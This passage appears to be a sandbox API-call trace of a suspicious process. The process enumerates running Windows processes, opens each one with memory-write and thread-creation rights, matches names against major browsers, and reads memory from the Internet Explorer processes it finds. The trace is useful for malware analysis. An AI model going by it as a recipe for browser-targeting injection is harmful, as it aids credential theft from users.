	[0205.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2ca4
	[0205.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.555] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.556] NtQueryInformationProcess (in: ProcessHandle=0x2ca4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.556] ReadProcessMemory (in: hProcess=0x2ca4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.556] ReadProcessMemory (in: hProcess=0x2ca4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.557] ReadProcessMemory (in: hProcess=0x2ca4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.557] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.557] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2ca8
	[0205.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.559] NtQueryInformationProcess (in: ProcessHandle=0x2ca8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.559] ReadProcessMemory (in: hProcess=0x2ca8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.559] ReadProcessMemory (in: hProcess=0x2ca8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.559] ReadProcessMemory (in: hProcess=0x2ca8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.559] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2cac
	[0205.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.560] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.561] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.561] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.562] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.562] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0205.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2cb0
	[0205.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.563] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0205.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.563] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.564] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0205.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.564] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2cb4
	[0205.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.565] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.565] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.566] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.566] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2cb8
	[0205.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.567] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.568] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.568] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.568] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.569] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0205.569] CloseHandle (hObject=0x188) returned 1
	[0205.569] Sleep (dwMilliseconds=0x64) 
	[0205.672] GetCurrentProcessId () returned 0x110
	[0205.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0205.675] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0205.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0205.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0205.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2cbc
	[0205.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.680] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.680] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.681] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.681] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2cc0
	[0205.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.682] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.683] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.683] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.683] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.683] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0205.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2cc4
	[0205.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.684] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0205.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.685] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.685] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0205.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.685] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2cc8
	[0205.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.686] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.687] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.687] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.687] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.687] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0205.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2ccc
	[0205.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.688] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0205.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.688] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.689] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0205.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.689] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.690] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0205.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2cd0
	[0205.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.691] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0205.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.691] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.692] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0205.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.692] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0205.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2cd4
	[0205.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.693] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0205.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.693] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.694] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0205.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.694] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.694] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0205.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2cd8
	[0205.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.695] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.695] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.695] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.696] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.696] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2cdc
	[0205.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.697] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.697] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.697] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2ce0
	[0205.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.698] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.699] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.699] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.699] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2ce4
	[0205.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.700] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.701] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.701] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.701] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2ce8
	[0205.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.702] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.703] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.703] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.703] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2cec
	[0205.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.704] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.705] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.705] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.705] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.706] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2cf0
	[0205.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.707] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.707] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.707] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2cf4
	[0205.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.708] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.709] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0205.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2cf8
	[0205.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.710] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0205.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.710] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0205.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
